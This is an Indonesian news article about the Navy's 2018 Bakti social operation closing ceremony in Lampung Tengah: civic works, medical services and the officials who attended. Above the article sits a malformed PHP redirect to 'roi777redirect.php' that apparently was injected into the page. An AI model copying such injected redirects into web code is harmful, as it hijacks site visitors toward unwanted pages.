header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Aslog Kasal Tutup Operasi Bakti TNI AL Tahun 2018 di Lampung -
Aslog Kasal Tutup Operasi Bakti TNI AL Tahun 2018 di Lampung

TRANSLAMPUNG.COM, LAMPUNG – Bertempat di lapangan 45 Transad, desa Bandar Agung kecamatan Terusan Nunyai kabupaten Lampung Tengah, Asisten Logistik (Aslog) Kasal Laksamana Muda TNI Mulyadi, S.Pi., M.A.P., menutup kegiatan Operasi Bakti TNI AL tahun 2018, Sabtu (31/03).

Dalam sambutan Kepala Staf Angkatan Laut (Kasal) Laksamana TNI Ade Supandi, S.E., M.A.P. yang dibacakan oleh Aslog Kasal disampaikan bahwa kegiatan bakti sosial dan kesehatan TNI AL dengan memperdayakan potensi maritim dilaksanakan bersama-sama dan terpadu dengan Pemerintah Daerah sebagai wujud kemanunggalan TNI dan rakyat, bertujuan untuk memakmurkan dan mensejahterakan masyarakat.

Pemerintah Daerah melalui Plt. Bupati Lampung Tengah menyampaikan bahwa Pemerintah Daerah menyampaikan terima kasihnya kepada TNI AL dan semua pihak yang telah banyak membantu serta terlibat dalam kegiatan, Bakti TNI AL dengan prioritas sasaran langsung dan menyentuh kepada pembangunan yang dibutuhkan oleh masyarakat, Pemerintah Daerah siap mendampingi kegiatan TNI AL terutama di seluruh wilayah Lampung Tengah.

Operasi Bakti TNI AL yang dilaksanakan selama 30 hari sejak tanggal 26 Februari 2018, selain di Lampung Tengah juga dilaksanakan di Lampung Utara dengan dikomandoi oleh Danlanal Lampung Kolonel Laut (P) Kelik Haryadi, S.H., M.Si. selaku Komandan Satgas yang kegiatanya meliputi sasaran pembangunan fisik dan non fisik seperti bedah rumah dan renovasi beberapa rumah veteran / warakawuri, renovasi musholah dan gereja, taman makam pahlawan, pembangunan jalan tani, sumur bor, pengobatan dan khitanan masal, pembagian sembako, penyuluhan hukum dan kesehatan, perkemahan pramuka, penghijauan berupa penanaman pohon serta Pameran alut sista TNI Polri.

Dalam penutupan kegiatan yang mendapat apresiasi yang sangat positif dari pemerintah daerah, masyarakat Bandar Agung dan sekitarnya itu dimeriahkan dengan aksi akrobatik terjun payung dari Prajurit Komando Pasukan Katak (Kopaska) Koarmabar,  Marching Band SMA 1 Bandar Agung dan aksi Freestyle dari Club Motor Trapak Lanal Lampung.

Hadir juga dalam acara penutupan tersebut, Asisten Potensi Maritim (Aspotmar) Kasal, Kadispotmar Mabesal, Kadispenal, Kadiswatpersal, Kadiskesal, Kadispotmar Armabar, Danlantamal III, unsur Fokorpimda tingkat Provinsi dan kabupaten Lampung Tengah, Tokoh agama, Tokoh masyarakat dan Tokoh pemuda serta ribuan Masyarakat desa Bandar Agung dan sekitarnya. (*)

News Reporter